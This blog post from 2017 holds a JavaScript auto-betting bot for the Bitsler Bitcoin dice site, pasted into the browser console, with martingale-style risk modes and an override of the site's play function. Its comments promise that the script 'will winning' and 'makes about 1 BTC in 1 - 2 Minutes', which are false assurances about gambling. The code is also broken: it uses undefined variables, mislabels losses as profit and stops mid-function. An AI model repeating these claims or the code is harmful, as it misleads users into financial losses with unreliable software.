Sunday, October 29, 2017

BITSLER New Updated Script 29 October 2017


// This script is written by
// Now this script will winning for you!
// Let's go:
console.clear();
// Tick the increase button
$('#id-bet-on-lose').click();
// Won variable
var won = null;
(function() {
alert("This script is coded by Christian **** (). If you have any problems, contact me");
var balance = parseFloat(prompt("Type in your exact balance!!!", '0.000001'));
if (balance == null || isNaN(balance)){alert("Invalid balance, aborting");return;}
if (!confirm("Do u agree that u don't share this software or sell this software if you are NOT BTC Programmer (earlier Clasher G), the Creator of this software? Youtube: https://www.youtube.com/watch?v=SEH4dK-Uido&t=27s")){
alert("STOPPING");
window.location.href = "http://bitsler.com";
}
var stopAmount = parseFloat(stopAmount);
var risk = prompt("How much risk you want to have? 1 - Low, 2 - Medium, 3 - High, 4 - Auto Mode 5 - Super Power 6 - Switching Mode, 7 - Super Save (new), 8 - Huge Profit" , '1');

if (risk != "1" && risk != "2" && risk != "3" && risk != "4" && risk != "5" && risk != "6" && risk != "7" && risk != "8"){
alert("Invalid risk entered, aborting");
return false;
}
if (risk == "1") {low();}
else if (risk == "2"){medium();}
else if (risk == "3"){high();}
else if (risk == "4"){automode();}
else if (risk == "5"){super_power();}
else if (risk == "6"){switch_mode();}
else if (risk == "7"){super_save();}
else {huge_profit();}
function medium() {
// Done
if (balance < 0.00001)
{
var amount = document.getElementById("amount").value = "0.00000005";
var chance = $.trim($("#editable-chance-field").val("9.99%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
// Done
else if (balance < 0.0001 && balance > 0.00001){
var amount = document.getElementById("amount").value = "0.00000010";
var chance = $.trim($("#editable-chance-field").val("9.90%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
// Done
else if (balance < 0.001 && balance > 0.0001) {
var amount = document.getElementById("amount").value = "0.0000001";
var chance = $.trim($("#editable-chance-field").val("66%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("110"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
// Done
else if (balance < 0.01 && balance > 0.001) {
var final_amount = balance > 0.001 && balance <= 0.002 ? 1 : balance > 0.002 && balance <= 0.003 ? 2 : balance > 0.003 && balance <= 0.004 ? 3 : balance > 0.004 && balance <= 0.005 ? 4 : balance > 0.005 && balance <= 0.006 ? 5 : balance > 0.006 && balance <= 0.007 ? 6 : balance > 0.007 && balance <= 0.008 ? 7 : balance > 0.008 && balance <= 0.009 ? 8 : balance > 0.009 && balance <= 0.01 ? 9 : 0;
var amount = document.getElementById("amount").value = "0.000000" + final_amount;
var chance = $.trim($("#editable-chance-field").val("4.95%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("7.77"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
// Done
else if (balance < 0.1 && balance > 0.01) {
var final_amount = balance > 0.01 && balance <= 0.02 ? 1 : balance > 0.02 && balance <= 0.03 ? 2 : balance > 0.03 && balance <= 0.04 ? 3 : balance > 0.04 && balance <= 0.05 ? 4 : balance > 0.05 && balance <= 0.06 ? 5 : balance > 0.06 && balance <= 0.07 ? 6 : balance > 0.07 && balance <= 0.08 ? 7 : balance > 0.08 && balance <= 0.09 ? 8 : balance > 0.09 && balance <= 0.1 ? 9 : 0;
var amount = document.getElementById("amount").value = "0.00000" + final_amount;
var chance = $.trim($("#editable-chance-field").val("4.95%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("7.77"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stopAmount){alert("You got your profit, enjoy");kill();}}, 1);
}
else if (balance >= 0.1 && balance <= 1) {
var final_amount = balance > 0.1 && balance <= 0.2 ? 1 : balance > 0.2 && balance <= 0.3 ? 2 : balance > 0.3 && balance <= 0.4 ? 3 : balance > 0.4 && balance <= 0.5 ? 4 : balance > 0.5 && balance <= 0.6 ? 5 : balance > 0.6 && balance <= 0.7 ? 6 : balance > 0.7 && balance <= 0.8 ? 7 : balance > 0.8 && balance <= 0.9 ? 8 : balance > 0.9 && balance <= 1 ? 9 : 2;
var amount = document.getElementById("amount").value = "0.0000" + final_amount;
var chance = $.trim($("#editable-chance-field").val("4.95%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("7.77"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var stopout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit < minus){alert("You got your profit, enjoy");kill();}}, 1);
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
else if (balance >= 1){

var amount = document.getElementById("amount").value = "0.000001";
var chance = $.trim($("#editable-chance-field").val("0.6%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("2.01"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
var stopout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit < minus){alert("You got your profit, enjoy");kill();}}, 1);
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
var stopout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit < minus){alert("You got your profit, enjoy");kill();}}, 1);
}
function huge_profit(){
var amount = document.getElementById("amount").value = "0.00001";
var chance = $.trim($("#editable-chance-field").val("3.33%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("7.77"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
function wait(ms){
   var start = new Date().getTime();
   var end = start;
   while(end < start + ms) {
     end = new Date().getTime();
  }
}
function jmp_up(void_function){
alert("The program will wait now 50 seconds, after that page will refresh and u can paste script again!");
wait(50000);
window.location.href.replace("http://bitsler.com", "http://bitsler.com");
}
function super_save() {

if (balance <= 0.001 && balance >= 0.0001) {
var amount = document.getElementById("amount").value = "0.00000001";
var chance = $.trim($("#editable-chance-field").val("9%"));
var payout = document.getElementById('editable-payout').innerHTML = "100";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("11"));
// First click the updated condition
$('#updated_condition').click();
// Tick increase on win button

// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance >= 0.001 && balance <= 0.01) {
var amount = document.getElementById("amount").value = "0.0000001";
var chance = $.trim($("#editable-chance-field").val("9%"));
var payout = document.getElementById('editable-payout').innerHTML = "100x";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("11"));
// First click the updated condition
$('#updated_condition').click();
// Tick increase on win button

// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance >= 0.01 && balance <= 0.1){
var amount = document.getElementById("amount").value = "0.000001";
var chance = $.trim($("#editable-chance-field").val("9%"));
var payout = document.getElementById('editable-payout').innerHTML = "100x";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("11"));
// First click the updated condition
$('#updated_condition').click();
// Tick increase on win button

// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance >= 0.1){
var amount = document.getElementById("amount").value = "0.00001";
var chance = $.trim($("#editable-chance-field").val("9%"));
var payout = document.getElementById('editable-payout').innerHTML = "100x";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("11"));
// First click the updated condition
$('#updated_condition').click();
// Tick increase on win button

// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
}
function high() {
if (balance < 0.00001)
{
var amount = document.getElementById("amount").value = "0.0000001";
var chance = $.trim($("#editable-chance-field").val("9.90%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.0001 && balance > 0.00001){
var amount = document.getElementById("amount").value = "0.00000025";
var chance = $.trim($("#editable-chance-field").val("15%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("30"));
// First click the updated condition
$('#updated_condition').click();
// Tick increase on win button

// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.001 && balance > 0.0001) {
var amount = document.getElementById("amount").value = "0.00000005";
var chance = $.trim($("#editable-chance-field").val("7.41%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.01 && balance > 0.001) {
var final_amount = balance > 0.001 && balance <= 0.002 ? 1 : balance > 0.002 && balance <= 0.003 ? 2 : balance > 0.003 && balance <= 0.004 ? 3 : balance > 0.004 && balance <= 0.005 ? 4 : balance > 0.005 && balance <= 0.006 ? 5 : balance > 0.006 && balance <= 0.007 ? 6 : balance > 0.007 && balance <= 0.008 ? 7 : balance > 0.008 && balance <= 0.009 ? 8 : balance > 0.009 && balance <= 0.01 ? 9 : 0;
final_amount = final_amount + 1;
var amount = document.getElementById("amount").value = "0.000000" + final_amount;
var chance = $.trim($("#editable-chance-field").val("9.9%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.1 && balance > 0.01) {
var amount = document.getElementById("amount").value = "0.000003";
var chance = $.trim($("#editable-chance-field").val("0.99%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("1.3"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance > 0.1) {
var amount = document.getElementById("amount").value = "0.000015";
var chance = $.trim($("#editable-chance-field").val("5.58%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("7.89"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
var stopout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit < minus){alert("You got your profit, enjoy");kill();}}, 1);
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your profit, enjoy");kill();}}, 1);
}
function low() {
if (balance < 0.00001)
{
var amount = document.getElementById("amount").value = "0.00000005";
var chance = $.trim($("#editable-chance-field").val("15%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("18"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.0001 && balance > 0.00001){
var amount = document.getElementById("amount").value = "0.00000002";
var chance = $.trim($("#editable-chance-field").val("66%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("660"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.001 && balance > 0.0001) {
var amount = document.getElementById("amount").value = "0.00000005";
var chance = $.trim($("#editable-chance-field").val("17%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("26"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.01 && balance > 0.001) {
var amount = document.getElementById("amount").value = "0.00000010";
var chance = $.trim($("#editable-chance-field").val("10%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance < 0.1 && balance > 0.01) {
var amount = document.getElementById("amount").value = "0.00000100";
var chance = $.trim($("#editable-chance-field").val("7.12%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("12"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (balance > 0.1) {
var amount = document.getElementById("amount").value = "0.0000";
var chance = $.trim($("#editable-chance-field").val("4.95%"));
var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("7.77"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
var stopout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit < minus){alert("You got your profit, enjoy");kill();}}, 1);
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your lose, try again:)");kill();}}, 1);
}

function kill(){
var stopBot = $('#btn-bet-stop-pilot-dice').click();
var startBot = $('#btn-bet-start-pilot-dice').click();
var stopout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit < minus){alert("You got your profit, enjoy");kill();}}, 1);
var timeout = setTimeout(function(){var profit = $('#auto_stats_profit').html(); var profit = parseFloat(profit);if (profit > stop){alert("You got your lose, try again:)");kill();}}, 1);
}
function super_power() {
// Here is the new method published in version 1.4
// Currently working only for 0.1 - 1 BTC
// Makes about 1 BTC in 1 - 2 Minutes
// 10% risk
if (balance < 0.001) {alert("Your balance is to low for super power, try other method!");return false;}
var super_risk = prompt("What's your super power risk?", "1 - Low (1.3%) 2 - Medium (2.5%) 3 -  High (10%), 4 - Mega (15%)", '1');
if (super_risk == "1") {
// Super power risk is low
var amount = document.getElementById("amount").value = "0.0000125";
var chance = $.trim($("#editable-chance-field").val("44%"));
var payout = document.getElementById('editable-payout').innerHTML = "2.400";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("86"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (super_risk == "2"){
// Super power risk is medium
var amount = document.getElementById("amount").value = "0.0001";
var chance = $.trim($("#editable-chance-field").val("41.25%"));
var payout = document.getElementById('editable-payout').innerHTML = "2.4000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("86"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (super_risk == "3"){
var amount = document.getElementById("amount").value = "0.001";
var chance = $.trim($("#editable-chance-field").val("41.25%"));
var payout = document.getElementById('editable-payout').innerHTML = "2.4000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("86"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else if (super_risk == "4"){
var amount = document.getElementById("amount").value = "0.004";
var chance = $.trim($("#editable-chance-field").val("41.25%"));
var payout = document.getElementById('editable-payout').innerHTML = "2.4000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("86"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
else {
// Super power risk is mega
var amount = document.getElementById("amount").value = "0.004";
var chance = $.trim($("#editable-chance-field").val("41.25%"));
var payout = document.getElementById('editable-payout').innerHTML = "2.4000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("86"));
// First click the updated condition
$('#updated_condition').click();
// Wait 50 ms
wait(50);
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
}
function automode() {
// Here is the method published in version 1.2
var risk1 = prompt("What's your automode risk? 1 - Low, 2 - Medium, 3 - High", '1');
if (risk1 != "1" && risk1 != "2" && risk1 != "3"){
alert("Invalid automode risk, aborting");
return false;
}
if (risk1 == "1")automode_low();
else if (risk1 == "2")automode_medium();
else automode_high();

}
function switch_mode() {
var method_1 = Math.random() * 5;
var method = Math.round(method_1);
var current = "";
switch (method) {
case 1:
current = "4.95%";
break;
case 2:
current = "5%";
break;
case 3:
current = "7.14%";
break;
case 4:
current = "5.58%";
break;
case 5:
current = "41.25%";
break;
default:
current = "5%";
break;
}
var amount = document.getElementById("amount").value = balance / 10000;

var chance = $.trim($("#editable-chance-field").val(current));
//var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var current_increase = "";
switch (current) {
case "4.95%":
current_increase = "7.77";
break;
case "5%":
current_increase = "6.66";
break;
case "7.14%":
current_increase = "12";
break;
case "5.58%":
current_increase = "7.89";
break;
case "41.25%":
current_increase = "70";
break;
default:
current_increase = "6.66";
break;
}
var increase = $.trim($("#pourc-bet-on-lose").val(current_increase));
// First click the updated condition
$('#updated_condition').click();
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";

}
function automode_low() {
var amount = document.getElementById("amount").value = "0.00000001";
var chance = $.trim($("#editable-chance-field").val("49.5%"));
//var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("100"));
// First click the updated condition
$('#updated_condition').click();
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";

}
function automode_high() {
var amount = document.getElementById("amount").value = "0.00000001";
var chance = $.trim($("#editable-chance-field").val("49.5%"));
//var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("300"));

// First click the updated condition
$('#updated_condition').click();
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";
}
function automode_medium() {
var amount = document.getElementById("amount").value = "0.00000001";
var chance = $.trim($("#editable-chance-field").val("49.5%"));
//var payout = document.getElementById('editable-payout').innerHTML = "49.5000";
// var increase = document.getElementById('pourc-bet-on-lose').value = "2";
// jQuery needed here:
var increase = $.trim($("#pourc-bet-on-lose").val("200"));
// First click the updated condition
$('#updated_condition').click();
$('#btn-bet-start-pilot-dice').click();
var stoprollButton = document.getElementById("btn-bet-stop-pilot-dice").innerHTML = "Stop Bot";
var startrollButton = document.getElementById("btn-bet-start-pilot-dice").innerHTML = "Start Bot";

}
function doubleamount() {
 var attr = $(this).attr("rel");
  var amount = parseFloat($("#amount" + attr).val());
  amount = round_float(amount * 2, devise_decimal);
  $("#amount" + attr).val(amount);
  window['var_amount' + attr] = amount;
  calculate_profit();
}

})();

// This is the modified bitsler play function
var stopAmount = prompt("Type in the amount after you want to stop", '0.0001');
var again = prompt("Type in  1 if you want to start the bot automatically after getting the profit and 2 for no", '1');
var stopAmountLos = prompt("Type in the amount of lose after u want to stop", '0.5');

var amount = $("#amount").val();
amount = round_float(amount, devise_decimal);
var balance = parseFloat($("#balance-"+devise).val());
console.log(balance);
var chance_1 = parseFloat($.trim($("#editable-chance-field").val()));
var how_much_loses = balance / amount;
console.log(how_much_loses);
var chance = (chance_1*0.01-1)*(-1);
console.log(chance);
var stopAmountLose = parseFloat(stopAmountLos);
stopAmountLose = stopAmountLose * -1;
var lose_chance = Math.pow(chance, how_much_loses);
if (lose_chance == 0){alert("The chance of losing is under: 0.0000001");}
else {alert("The chance of losing is: " + lose_chance * 100 + "%");}
console.log(stopAmountLose);

if (isNaN(stopAmount) || stopAmount == null){alert("Invalid Profit after to Stop, aborting");}
function play() {
if (game_in_progress == true) {
$("#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice").button("reset");
return false;
}

game_in_progress = true;

if (autobet_mode == false) {
var amount = $("#amount").val();
var condition = $("#condition-input").val();
var game = $("#game-input").val();
}
else {
var amount = auto_amount;
var condition = auto_condition;
var game = auto_game;
}

amount = round_float(amount, devise_decimal);


var profit = parseFloat($("#profit").val());
var balance = parseFloat($("#balance-"+devise).val());
var error = false;
var error_value = "";
var error_title = "";
var error_info = "";

if (auto_stats_profit > stopAmount) {
